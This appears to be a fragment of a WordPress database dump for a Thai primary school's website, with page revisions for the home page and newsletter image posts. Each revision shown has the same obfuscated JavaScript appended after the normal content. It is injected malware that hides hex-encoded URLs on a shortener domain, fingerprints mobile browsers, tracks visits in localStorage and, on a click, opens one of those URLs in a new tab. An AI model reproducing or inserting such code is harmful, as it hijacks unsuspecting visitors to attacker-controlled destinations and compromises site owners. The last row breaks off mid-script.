{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 22:37:12','2024-07-27 15:37:12','',14,'http://pakhaeng.ssk.in.th/?p=188',0,'revision','',0),
(189,1,'2024-07-27 22:37:31','2024-07-27 15:37:31','','1-2566','','inherit','','closed','','1-2566-3','','','2024-07-27 22:37:31','2024-07-27 15:37:31','',187,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-2566-2.png',0,'attachment','image/png',0),
(190,1,'2024-07-27 22:37:54','2024-07-27 15:37:54','<!-- wp:image {\"id\":189,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-2566-2-724x1024.png\" alt=\"\" class=\"wp-image-189\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','187-revision-v1','','','2024-07-27 22:37:54','2024-07-27 15:37:54','',187,'http://pakhaeng.ssk.in.th/?p=190',0,'revision','',0),
(191,1,'2024-07-27 22:38:34','2024-07-27 15:38:34','<!-- wp:image {\"id\":192,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/2-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-192\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x